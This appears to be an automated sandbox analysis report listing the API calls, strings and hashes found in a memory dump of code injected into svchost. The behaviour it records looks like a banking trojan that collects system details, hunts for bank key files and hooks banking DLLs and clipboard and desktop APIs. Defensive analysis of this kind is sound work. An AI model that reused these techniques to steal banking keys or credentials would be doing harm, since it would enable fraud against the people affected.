WriteFile.KERNEL32(00000000,{Windows directory: ,00000014,00000000,00000000), ref: 02D254D4
UnlockFile.KERNEL32(00000000,00000000,00000000,00000014,00000000), ref: 02D254E5
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02D25510
LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02D2551F
WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 02D25533
UnlockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02D25546
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02D2555A
LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02D25567
WriteFile.KERNEL32(00000000,02D65A7C,00000002,00000000,00000000), ref: 02D25577
UnlockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02D25588
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02D2559C
LockFile.KERNEL32(00000000,00000000,00000000,00000010,00000000), ref: 02D255A9
WriteFile.KERNEL32(00000000,{Administrator: ,00000010,00000000,00000000), ref: 02D255B9
UnlockFile.KERNEL32(00000000,00000000,00000000,00000010,00000000), ref: 02D255CA
IsUserAnAdmin.SHELL32 ref: 02D255D0
IsUserAnAdmin.SHELL32 ref: 02D255F3
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02D25625
LockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 02D25634
WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 02D25645
UnlockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 02D25658
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02D2566C
LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02D25678
WriteFile.KERNEL32(00000000,02D65A7C,00000002,00000000,00000000), ref: 02D25688
UnlockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02D25696

Part of subcall function 02D246C0: RegOpenKeyExA.ADVAPI32(80000001,Software\Microsoft\Internet Explorer\TypedURLs,00000000,00020119,?), ref: 02D246E5
Part of subcall function 02D246C0: _snprintf.MSVCRT ref: 02D2470D
Part of subcall function 02D246C0: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,74DF3490), ref: 02D24747
Part of subcall function 02D246C0: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02D24769
Part of subcall function 02D246C0: LockFile.KERNEL32(00000000,00000000,00000000,0000000C,00000000), ref: 02D24775
Part of subcall function 02D246C0: WriteFile.KERNEL32(00000000,IE history:,0000000C,02D256A1,00000000), ref: 02D24789
Part of subcall function 02D246C0: UnlockFile.KERNEL32(00000000,00000000,00000000,0000000C,00000000), ref: 02D24797
Part of subcall function 02D246C0: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02D247AB
Part of subcall function 02D246C0: LockFile.KERNEL32(00000000,00000000,00000000,00000001,00000000), ref: 02D247B7
Part of subcall function 02D246C0: WriteFile.KERNEL32(00000000,02D65B10,00000001,00000000,00000000), ref: 02D247CB
Part of subcall function 02D246C0: UnlockFile.KERNEL32(00000000,00000000,00000000,00000001,00000000), ref: 02D247D9

Part of subcall function 02D23F40: GetProcessHeap.KERNEL32(00000008,00000C10,00000000,00000000,74DF3490), ref: 02D23F5D
Part of subcall function 02D23F40: HeapAlloc.KERNEL32(00000000), ref: 02D23F60
Part of subcall function 02D23F40: memset.MSVCRT ref: 02D23F74
Part of subcall function 02D23F40: GetTcpTable.IPHLPAPI(00000000,00000C00,00000001), ref: 02D23FE4
Part of subcall function 02D23F40: GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D23FF2
Part of subcall function 02D23F40: HeapValidate.KERNEL32(00000000), ref: 02D23FF5
Part of subcall function 02D23F40: GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D24002
Part of subcall function 02D23F40: HeapFree.KERNEL32(00000000), ref: 02D24005
Part of subcall function 02D23F40: GetProcessHeap.KERNEL32(00000008,00000BED), ref: 02D2401D
Part of subcall function 02D23F40: HeapAlloc.KERNEL32(00000000), ref: 02D24020
Part of subcall function 02D23F40: memset.MSVCRT ref: 02D24030
Part of subcall function 02D23F40: GetTcpTable.IPHLPAPI(00000000,00000C00,00000001), ref: 02D2404A
Part of subcall function 02D23F40: GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D24057
Part of subcall function 02D23F40: HeapValidate.KERNEL32(00000000), ref: 02D2405A
Part of subcall function 02D23F40: GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D2406B
Part of subcall function 02D23F40: HeapFree.KERNEL32(00000000), ref: 02D2406E

Part of subcall function 02D24290: memset.MSVCRT ref: 02D242C3
Part of subcall function 02D24290: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02D242CE
Part of subcall function 02D24290: Process32First.KERNEL32 ref: 02D242F1
Part of subcall function 02D24290: GetHandleInformation.KERNEL32(00000000,?), ref: 02D2430D
Part of subcall function 02D24290: CloseHandle.KERNEL32(00000000), ref: 02D24327

Part of subcall function 02D244D0: NetQueryDisplayInformation.NETAPI32(00000000,00000001,00000000,000003E8,000000FF,00000000,00000000,00000000,00000000,74DF3490,?,?,?,?,02D256B3,00000000), ref: 02D2451A
Part of subcall function 02D244D0: GetProcessHeap.KERNEL32(00000008,00000014,?,?,?,?,02D256B3,00000000,00000000,00000000), ref: 02D24565
Part of subcall function 02D244D0: HeapAlloc.KERNEL32(00000000,?,?,?,?,02D256B3,00000000,00000000,00000000), ref: 02D2456C
Part of subcall function 02D244D0: memset.MSVCRT ref: 02D2457F
Part of subcall function 02D244D0: _snprintf.MSVCRT ref: 02D245CA

GetHandleInformation.KERNEL32(00000000,00000000,00000000,00000000), ref: 02D256C4
CloseHandle.KERNEL32(00000000), ref: 02D256D5

Strings

{Administrator: , xrefs: 02D255B3
{Uptime: , xrefs: 02D253C5
4.2.5, xrefs: 02D24A71
false, xrefs: 02D255DF, 02D25604
{Process: , xrefs: 02D24B09
dd:MMM:yyyy, xrefs: 02D25049
PROCESSOR_IDENTIFIER, xrefs: 02D24CCC
{Date: , xrefs: 02D25082
XXX, xrefs: 02D24E77
%c%d:%02d, xrefs: 02D252A7
%dx%d@%d, xrefs: 02D24F3E
{Username: , xrefs: 02D24C00
{GMT: , xrefs: 02D252E0
{Language: , xrefs: 02D24E5A
{Processor: , xrefs: 02D24CFC
{Screen: , xrefs: 02D24F7D
true, xrefs: 02D255D8, 02D255F9
{Windows directory: , xrefs: 02D254CE
{BotVer: , xrefs: 02D24A2F
{Local time: , xrefs: 02D25187
HH:mm:ss, xrefs: 02D2514E

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: File$LockPointerUnlockWrite$Heap$Process$memset$HandleInformationSystem_snprintf$AllocUser$AdminCloseCreateFormatFreeMetricsNameQueryTableTimeValidate$CapsDateDefaultDeviceDirectoryDisplayEnvironmentFirstLangModuleOpenProcess32SnapshotToolhelp32ValueVariableWindowsZone
String ID: %c%d:%02d$%dx%d@%d$4.2.5$HH:mm:ss$PROCESSOR_IDENTIFIER$XXX$dd:MMM:yyyy$false$true${Administrator: ${BotVer: ${Date: ${GMT: ${Language: ${Local time: ${Process: ${Processor: ${Screen: ${Uptime: ${Username: ${Windows directory:
API String ID: 58573281-2909121063
Opcode ID: dbba8f8f4dfc7647160e93b1fc450247ae37353af0cbececea694a39a7fb0223
Instruction ID: 5950db4e87c317bce4b54742063913cab83ef304021a53034a1e4eec4085bc17
Opcode Fuzzy Hash: dbba8f8f4dfc7647160e93b1fc450247ae37353af0cbececea694a39a7fb0223
Instruction Fuzzy Hash: C0A200B4A91218BEFB209B94DC4AFEE7778AF49B04F508544F601BA2C0D7F46A448B65

Function 02D3D060 Relevance: 193.3, APIs: 94, Strings: 16, Instructions: 833COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 02D3D080
memset.MSVCRT ref: 02D3D09D
SetErrorMode.KERNEL32(00000001,?,?,?,?,75B07390,?), ref: 02D3D0AD
GetLogicalDriveStringsA.KERNEL32(00000104,?), ref: 02D3D0BC
SetErrorMode.KERNEL32(00000001,?,?,?,?,75B07390,?), ref: 02D3D0D3
GetDriveTypeA.KERNEL32(?,?,?,?,?,75B07390,?), ref: 02D3D0EC
SetCurrentDirectoryA.KERNEL32(?,?,?,?,?,75B07390,?), ref: 02D3D122
GetFileAttributesA.KERNEL32(header.key,?,?,?,?,75B07390,?), ref: 02D3D135
PathAddBackslashA.SHLWAPI(5E8DC08D,?,?,?,?,75B07390,?), ref: 02D3D164
CreateDirectoryA.KERNEL32(?,00000000,?,?,?,?,75B07390,?), ref: 02D3D1A4
GetLastError.KERNEL32(?,?,?,?,75B07390,?), ref: 02D3D1AA
IsUserAnAdmin.SHELL32 ref: 02D3D1B2
PathMakeSystemFolderA.SHLWAPI(?), ref: 02D3D1C1
SetLastError.KERNEL32(00000000,?,?,?,?,75B07390,?), ref: 02D3D1C8
CreateDirectoryA.KERNEL32(?,00000000,?,?,?,?,75B07390,?), ref: 02D3D1FE
GetLastError.KERNEL32(?,?,?,?,75B07390,?), ref: 02D3D204
IsUserAnAdmin.SHELL32 ref: 02D3D20C
PathMakeSystemFolderA.SHLWAPI(?), ref: 02D3D21B
SetLastError.KERNEL32(00000000,?,?,?,?,75B07390,?), ref: 02D3D222
SetErrorMode.KERNEL32(?), ref: 02D3DAB0

Strings

5E8DC08D, xrefs: 02D3D15F, 02D3D16A, 02D3D28F, 02D3D29A, 02D3D3BF, 02D3D3CA, 02D3D4FF, 02D3D50A, 02D3D630, 02D3D63B, 02D3D76F, 02D3D77A, 02D3D89F, 02D3D8AA, 02D3D952, 02D3D95D, 02D3D9F1, 02D3D9FC
masks2.key, xrefs: 02D3D269, 02D3D389
\name.key, xrefs: 02D3D5D8
keys99, xrefs: 02D3D1DB, 02D3D30B, 02D3D43B, 02D3D57B, 02D3D6AC, 02D3D7EB, 02D3D99D
\header.key, xrefs: 02D3D238
\primary2.key, xrefs: 02D3D708
\masks.key, xrefs: 02D3D498
keys99.zip, xrefs: 02D3D919
header.key, xrefs: 02D3D130, 02D3D256
path99.txt, xrefs: 02D3DA38
\primary.key, xrefs: 02D3D848
masks.key, xrefs: 02D3D399, 02D3D4C4
name.key, xrefs: 02D3D4D4, 02D3D5F7
primary.key, xrefs: 02D3D744, 02D3D86F
\masks2.key, xrefs: 02D3D368
primary2.key, xrefs: 02D3D60B, 02D3D730

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: Error$Last$DirectoryModePath$AdminCreateDriveFolderMakeSystemUsermemset$AttributesBackslashCurrentFileLogicalStringsType
String ID: 5E8DC08D$\header.key$\masks.key$\masks2.key$\name.key$\primary.key$\primary2.key$header.key$keys99$keys99.zip$masks.key$masks2.key$name.key$path99.txt$primary.key$primary2.key
API String ID: 857499637-3982077908
Opcode ID: 36f801f30d4b240cfcf10fcb2018f3ae5037e9deb135cb51d0398e703923bd30
Instruction ID: 82d2c670ca82462d71f3b98a0f0192250e9982deaa1368ded65097cbecd2bea4
Opcode Fuzzy Hash: 36f801f30d4b240cfcf10fcb2018f3ae5037e9deb135cb51d0398e703923bd30
Instruction Fuzzy Hash: 286214319483468FC712DF34E46CAAA7BE6EF89700B588958E4C6C7311EB71DC59CBA1

Function 02D2BA40 Relevance: 179.0, APIs: 63, Strings: 39, Instructions: 494libraryloaderfileCOMMON

Download Yara Rule

APIs

HeapCreate.KERNEL32(00000000,00000000,00000000), ref: 02D2BA57
GetCurrentProcessId.KERNEL32 ref: 02D2BA62

Part of subcall function 02D2D7A0: GetComputerNameA.KERNEL32(02D6F588,?), ref: 02D2D7B7
Part of subcall function 02D2D7A0: lstrlenA.KERNEL32(02D6F588,?,?,?,02D3714F), ref: 02D2D7C2
Part of subcall function 02D2D7A0: wsprintfA.USER32 ref: 02D2D802
Part of subcall function 02D2D7A0: wsprintfA.USER32 ref: 02D2D812
Part of subcall function 02D2D7A0: wsprintfA.USER32 ref: 02D2D822
Part of subcall function 02D2D7A0: wsprintfA.USER32 ref: 02D2D82F
Part of subcall function 02D2D7A0: wsprintfA.USER32 ref: 02D2D83C

RegisterWindowMessageA.USER32(a1633b6ba), ref: 02D2BA77
OpenFileMappingA.KERNEL32(000F001F,00000000,02D6F5A0), ref: 02D2BAA0
OpenMutexA.KERNEL32(001F0001,00000000,02D6F670), ref: 02D2BAB3
OpenMutexA.KERNEL32(001F0001,00000000,02D6F630), ref: 02D2BACA
MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000), ref: 02D2BAE6
Sleep.KERNEL32(000000C8), ref: 02D2BAF6
GetCurrentThreadId.KERNEL32 ref: 02D2BAFE
GetThreadDesktop.USER32(00000000,00000002,?,00000100,?), ref: 02D2BB17
GetUserObjectInformationA.USER32(00000000), ref: 02D2BB1E
lstrcmpiA.KERNEL32(?,a1633b6ba), ref: 02D2BB34
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02D2BB60
OpenFileMappingA.KERNEL32(000F001F,00000000,02D6F54C), ref: 02D2BB6E
MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000), ref: 02D2BB81
GetHandleInformation.KERNEL32(00000000,00000000), ref: 02D2BBB8
CloseHandle.KERNEL32(?), ref: 02D2BBCC
Sleep.KERNEL32(000000C8), ref: 02D2BBD7
ReleaseMutex.KERNEL32(00000000), ref: 02D2BBE4
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02D2BBEF
OpenFileMappingA.KERNEL32(000F001F,00000000,02D6F54C), ref: 02D2BBFD
MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000), ref: 02D2BC10
ReleaseMutex.KERNEL32(00000000), ref: 02D2BC25
OpenEventA.KERNEL32(001F0003,00000000,02D6F5DC), ref: 02D2BC33
GetTickCount.KERNEL32 ref: 02D2BC3E
LoadLibraryExA.KERNEL32(user32.dll,00000000,00000000), ref: 02D2BC52
GetProcAddress.KERNEL32(00000000,DefWindowProcW), ref: 02D2BC8C
GetProcAddress.KERNEL32(00000000,DefWindowProcA), ref: 02D2BCAC
GetProcAddress.KERNEL32(00000000,DefDlgProcW), ref: 02D2BCCC
GetProcAddress.KERNEL32(00000000,DefDlgProcA), ref: 02D2BCEC
GetProcAddress.KERNEL32(00000000,DefFrameProcW), ref: 02D2BD0C
GetProcAddress.KERNEL32(00000000,DefFrameProcA), ref: 02D2BD2C
GetProcAddress.KERNEL32(00000000,DefMDIChildProcW), ref: 02D2BD4C
GetProcAddress.KERNEL32(00000000,DefMDIChildProcA), ref: 02D2BD6C
GetProcAddress.KERNEL32(00000000,CallWindowProcW), ref: 02D2BD8C

Part of subcall function 02D3A040: VirtualAlloc.KERNEL32(00000000,-00000008,00003000,00000040,74DEF550,00000000,75BFBD50,?,?,?,02D3938A,00000000,02D391E0,02D7A04C), ref: 02D3A078
Part of subcall function 02D3A040: memcpy.MSVCRT ref: 02D3A0A0
Part of subcall function 02D3A040: VirtualProtect.KERNEL32(00000000,?,00000040,02D3938A,?,?,?,?,?,?,02D3938A,00000000,02D391E0,02D7A04C), ref: 02D3A135
Part of subcall function 02D3A040: VirtualProtect.KERNEL32(?,00000000,00000040,02D3938A,?,?,?,?,?,?,02D3938A,00000000,02D391E0,02D7A04C), ref: 02D3A14A

GetProcAddress.KERNEL32(00000000,CallWindowProcA), ref: 02D2BDAC

Part of subcall function 02D3A040: VirtualProtect.KERNEL32(?,00000000,02D3938A,?,?,?,00000000,00000000,?,?,?,?,?,?,02D3938A,00000000), ref: 02D3A17A
Part of subcall function 02D3A040: VirtualProtect.KERNEL32(?,00000000,02D3938A,?,?,?,?,?,?,?,02D3938A,00000000,02D391E0,02D7A04C), ref: 02D3A186
Part of subcall function 02D3A040: GetCurrentProcess.KERNEL32(00000000,00000000,74DEF550,00000000,75BFBD50,?,?,?,02D3938A,00000000,02D391E0,02D7A04C), ref: 02D3A197
Part of subcall function 02D3A040: FlushInstructionCache.KERNEL32(00000000,?,?,?,02D3938A,00000000,02D391E0,02D7A04C), ref: 02D3A19E

GetProcAddress.KERNEL32(00000000,RegisterClassW), ref: 02D2BDCC
GetProcAddress.KERNEL32(00000000,RegisterClassA), ref: 02D2BDEC
GetProcAddress.KERNEL32(00000000,RegisterClassExA), ref: 02D2BE0C
GetProcAddress.KERNEL32(00000000,RegisterClassExW), ref: 02D2BE2C
GetProcAddress.KERNEL32(00000000,PeekMessageW), ref: 02D2BE4C
GetProcAddress.KERNEL32(00000000,PeekMessageA), ref: 02D2BE6C
GetProcAddress.KERNEL32(00000000,OpenInputDesktop), ref: 02D2BE8C
GetProcAddress.KERNEL32(00000000,OpenDesktopA), ref: 02D2BEAC
GetProcAddress.KERNEL32(00000000,OpenDesktopW), ref: 02D2BECC
GetProcAddress.KERNEL32(00000000,SwitchDesktop), ref: 02D2BEEC
GetProcAddress.KERNEL32(00000000,MessageBeep), ref: 02D2BF0C
GetProcAddress.KERNEL32(00000000,FlashWindowEx), ref: 02D2BF2C
GetProcAddress.KERNEL32(00000000,GetCursorPos), ref: 02D2BF4C
GetProcAddress.KERNEL32(00000000,SetCursorPos), ref: 02D2BF6C
GetProcAddress.KERNEL32(00000000,GetMessagePos), ref: 02D2BF8C
GetProcAddress.KERNEL32(00000000,SetCapture), ref: 02D2BFAC
GetProcAddress.KERNEL32(00000000,ReleaseCapture), ref: 02D2BFCC
GetProcAddress.KERNEL32(00000000,GetCapture), ref: 02D2BFEC
LoadLibraryExA.KERNEL32(Winmm.dll,00000000,00000000,00000000,02D2B880,02D6EB4C), ref: 02D2C013
GetProcAddress.KERNEL32(00000000,PlaySoundW), ref: 02D2C025
GetProcAddress.KERNEL32(00000000,PlaySoundA), ref: 02D2C045
GetProcAddress.KERNEL32(00000000,sndPlaySoundW), ref: 02D2C065
GetProcAddress.KERNEL32(00000000,sndPlaySoundA), ref: 02D2C085
LoadLibraryExA.KERNEL32(Kernel32.dll,00000000,00000000,00000000,02D2B470,02D6EB64), ref: 02D2C0A4
GetProcAddress.KERNEL32(00000000,Beep), ref: 02D2C0B0
LoadLibraryExA.KERNEL32(Gdi32.dll,00000000,00000000,00000000,02D2B4B0,02D6EB78), ref: 02D2C0CF
GetProcAddress.KERNEL32(00000000,SetDIBitsToDevice), ref: 02D2C0DB

Strings

MessageBeep, xrefs: 02D2BF06
Kernel32.dll, xrefs: 02D2C09F
Gdi32.dll, xrefs: 02D2C0CA
PlaySoundW, xrefs: 02D2C01F
sndPlaySoundW, xrefs: 02D2C05F
user32.dll, xrefs: 02D2BC48
RegisterClassA, xrefs: 02D2BDE6
Beep, xrefs: 02D2C0AA
OpenDesktopA, xrefs: 02D2BEA6
ReleaseCapture, xrefs: 02D2BFC6
CallWindowProcA, xrefs: 02D2BDA6
DefMDIChildProcW, xrefs: 02D2BD46
GetMessagePos, xrefs: 02D2BF86
sndPlaySoundA, xrefs: 02D2C07F
DefDlgProcW, xrefs: 02D2BCC6
DefMDIChildProcA, xrefs: 02D2BD66
DefFrameProcW, xrefs: 02D2BD06
DefFrameProcA, xrefs: 02D2BD26
DefWindowProcW, xrefs: 02D2BC86
OpenDesktopW, xrefs: 02D2BEC6
RegisterClassExW, xrefs: 02D2BE26
SetDIBitsToDevice, xrefs: 02D2C0D5
GetCapture, xrefs: 02D2BFE6
GetCursorPos, xrefs: 02D2BF46
Winmm.dll, xrefs: 02D2C00E
RegisterClassW, xrefs: 02D2BDC6
DefDlgProcA, xrefs: 02D2BCE6
CallWindowProcW, xrefs: 02D2BD86
SwitchDesktop, xrefs: 02D2BEE6
SetCapture, xrefs: 02D2BFA6
FlashWindowEx, xrefs: 02D2BF26
PeekMessageA, xrefs: 02D2BE66
OpenInputDesktop, xrefs: 02D2BE86
SetCursorPos, xrefs: 02D2BF66
DefWindowProcA, xrefs: 02D2BCA6
a1633b6ba, xrefs: 02D2BA72, 02D2BB28
PlaySoundA, xrefs: 02D2C03F
PeekMessageW, xrefs: 02D2BE46
RegisterClassExA, xrefs: 02D2BE06

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: AddressProc$FileOpen$Virtualwsprintf$LibraryLoadMutexProtect$CurrentMappingObjectView$HandleInformationProcessReleaseSingleSleepThreadWait$AllocCacheCloseComputerCountCreateDesktopEventFlushHeapInstructionMessageNameRegisterTickUserWindowlstrcmpilstrlenmemcpy
String ID: Beep$CallWindowProcA$CallWindowProcW$DefDlgProcA$DefDlgProcW$DefFrameProcA$DefFrameProcW$DefMDIChildProcA$DefMDIChildProcW$DefWindowProcA$DefWindowProcW$FlashWindowEx$Gdi32.dll$GetCapture$GetCursorPos$GetMessagePos$Kernel32.dll$MessageBeep$OpenDesktopA$OpenDesktopW$OpenInputDesktop$PeekMessageA$PeekMessageW$PlaySoundA$PlaySoundW$RegisterClassA$RegisterClassExA$RegisterClassExW$RegisterClassW$ReleaseCapture$SetCapture$SetCursorPos$SetDIBitsToDevice$SwitchDesktop$Winmm.dll$a1633b6ba$sndPlaySoundA$sndPlaySoundW$user32.dll
API String ID: 1664322764-1755510222
Opcode ID: 632d57109f4f4e815b92ca987a47fd4444e6093def5f82556c2c15585f987da0
Instruction ID: 297d7ec8a753f568ea058bd8f2864f74a0e3dfdb2b27498aa4d03dd9ed4e608f
Opcode Fuzzy Hash: 632d57109f4f4e815b92ca987a47fd4444e6093def5f82556c2c15585f987da0
Instruction Fuzzy Hash: 00D16374BC032776FA206A71AE5EF6A2B5C5B24E4CF240812B543B6345DEF8EC4D8974

Function 02D35230 Relevance: 114.1, APIs: 43, Strings: 22, Instructions: 302libraryloaderthreadCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 02D35251
GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,74DEF550,75B07390,74DF0A60), ref: 02D35267
AddVectoredExceptionHandler.KERNEL32(00000001,02D23AE0), ref: 02D35274
CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 02D3528F
CreateThread.KERNEL32(00000000,00000000,02D3A2B0,00000000,00000000,00000000), ref: 02D352A9
GetHandleInformation.KERNEL32(00000000,?), ref: 02D352C1
CloseHandle.KERNEL32(00000000), ref: 02D352D2
InitializeCriticalSection.KERNEL32(02D6FB50), ref: 02D352E3
LoadLibraryExA.KERNEL32(user32.dll,00000000,00000000), ref: 02D352F9
GetProcAddress.KERNEL32(00000000,GetClipboardData), ref: 02D3530B
LoadLibraryExA.KERNEL32(user32.dll,00000000,00000000), ref: 02D3532A
GetProcAddress.KERNEL32(00000000,TranslateMessage), ref: 02D35338
GetProcAddress.KERNEL32(00000000,GetMessageA), ref: 02D35354
GetProcAddress.KERNEL32(00000000,GetMessageW), ref: 02D35370
InitializeCriticalSection.KERNEL32(02D6FB38), ref: 02D3538B
GetModuleHandleA.KERNEL32(ntdll.dll), ref: 02D35392
GetProcAddress.KERNEL32(00000000,ZwQuerySystemInformation), ref: 02D353A2
GetCurrentProcessId.KERNEL32(00000000,02D27760,02D79E88), ref: 02D353B8
GetCurrentThreadId.KERNEL32 ref: 02D353D3
GetThreadDesktop.USER32(00000000,00000002,?,00000100,?), ref: 02D353E8
GetUserObjectInformationA.USER32(00000000), ref: 02D353EF
lstrcmpiA.KERNEL32(?,a1633b6ba), ref: 02D35401
LoadLibraryExA.KERNEL32(user32.dll,00000000,00000000), ref: 02D3541B
GetProcAddress.KERNEL32(00000000,SetThreadDesktop), ref: 02D3542B
GetCurrentProcessId.KERNEL32(00000000,02D2B930,02D6EB74), ref: 02D35441
GetCurrentThreadId.KERNEL32 ref: 02D35450
GetThreadDesktop.USER32(00000000,00000002,?,00000100,?), ref: 02D35465
GetUserObjectInformationA.USER32(00000000), ref: 02D3546C
lstrcmpiA.KERNEL32(?,a1633b6ba), ref: 02D3547E
StrStrIA.SHLWAPI(00000000,java), ref: 02D354B2
StrStrIA.SHLWAPI(00000000,.exe), ref: 02D354C4
StrStrIA.SHLWAPI(00000000,frd.exe), ref: 02D354DA
LoadLibraryExA.KERNEL32(ws2_32.dll,00000000,00000000), ref: 02D354F1
GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 02D354FF
GetProcAddress.KERNEL32(00000000,gethostbyname), ref: 02D3551B
GetProcAddress.KERNEL32(00000000,inet_addr), ref: 02D35537
InitializeCriticalSection.KERNEL32(02D6FB20), ref: 02D35552
LoadLibraryExA.KERNEL32(sks2xyz.dll,00000000,00000000), ref: 02D3557F
GetProcAddress.KERNEL32(00000000,vb_pfx_import), ref: 02D3558B
LoadLibraryExA.KERNEL32(FilialRCon.dll,00000000,00000000), ref: 02D355AA
GetProcAddress.KERNEL32(00000000,RCN_R50Buffer), ref: 02D355B6
LoadLibraryExA.KERNEL32(mespro.dll,00000000,00000000), ref: 02D355D5
GetProcAddress.KERNEL32(00000000,AddPSEPrivateKeyEx), ref: 02D355E1

Strings

FilialRCon.dll, xrefs: 02D355A5
.exe, xrefs: 02D354B8
inet_addr, xrefs: 02D35531
vb_pfx_import, xrefs: 02D35585
user32.dll, xrefs: 02D352F4, 02D35325, 02D35416
GetMessageW, xrefs: 02D3536A
gethostbyname, xrefs: 02D35515
java, xrefs: 02D354A6
GetMessageA, xrefs: 02D3534E
ZwQuerySystemInformation, xrefs: 02D3539C
getaddrinfo, xrefs: 02D354F9
frd.exe, xrefs: 02D354CE
sks2xyz.dll, xrefs: 02D3557A
TranslateMessage, xrefs: 02D35332
ntdll.dll, xrefs: 02D3538D
GetClipboardData, xrefs: 02D35305
AddPSEPrivateKeyEx, xrefs: 02D355DB
mespro.dll, xrefs: 02D355D0
ws2_32.dll, xrefs: 02D354EC
SetThreadDesktop, xrefs: 02D35425
a1633b6ba, xrefs: 02D353F5, 02D35472
RCN_R50Buffer, xrefs: 02D355B0

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad$Thread$Current$CriticalHandleInformationInitializeSection$CreateDesktopModuleObjectProcessUserlstrcmpi$CloseExceptionFileHandlerMutexNameVectoredmemset
String ID: .exe$AddPSEPrivateKeyEx$FilialRCon.dll$GetClipboardData$GetMessageA$GetMessageW$RCN_R50Buffer$SetThreadDesktop$TranslateMessage$ZwQuerySystemInformation$a1633b6ba$frd.exe$getaddrinfo$gethostbyname$inet_addr$java$mespro.dll$ntdll.dll$sks2xyz.dll$user32.dll$vb_pfx_import$ws2_32.dll
API String ID: 1248150503-2947894363
Opcode ID: dbcf6159ca0bc7e6947b4c7db649f1a72330b7c394f951e923588bf01c3bfd29
Instruction ID: 41694e048695450f00fc5379cd06d6b9caace946e6ac85a7097ea2f80eeb0cd0
Opcode Fuzzy Hash: dbcf6159ca0bc7e6947b4c7db649f1a72330b7c394f951e923588bf01c3bfd29
Instruction Fuzzy Hash: 0E917071BC03167AFA216BB1FC0EF6A27589B18B44F944510B542F6384DBE8ED48CA75

Function 02D2D130 Relevance: 101.9, APIs: 55, Strings: 3, Instructions: 429windowsynchronizationmemoryCOMMON

Download Yara Rule

APIs

GetWindowLongA.USER32(?,000000F0), ref: 02D2D18F
SetWindowLongA.USER32(?,000000F0,00000000), ref: 02D2D19A
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027), ref: 02D2D1AD
GetDlgItem.USER32(?,?), ref: 02D2D1C2
GetWindowLongA.USER32(00000000,000000EB), ref: 02D2D1D1
SetWindowTextA.USER32(?,-00000008), ref: 02D2D1DD
GetWindowLongA.USER32(00000000,000000F0), ref: 02D2D1EC
SetWindowLongA.USER32(00000000,000000F0,00000000), ref: 02D2D1F7
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000027), ref: 02D2D20A
GetDlgItem.USER32(?,000003E9), ref: 02D2D248
GetClassLongA.USER32(00000000,000000E6), ref: 02D2D258
SetClassLongA.USER32(00000000,000000E6,00000000), ref: 02D2D267
SendMessageA.USER32(?,00000031,00000000,00000000), ref: 02D2D27F
GetObjectA.GDI32(00000000,0000003C,?), ref: 02D2D289
CreateFontIndirectA.GDI32 ref: 02D2D29F
SendMessageA.USER32(?,00000030,00000000,00000000), ref: 02D2D2AF
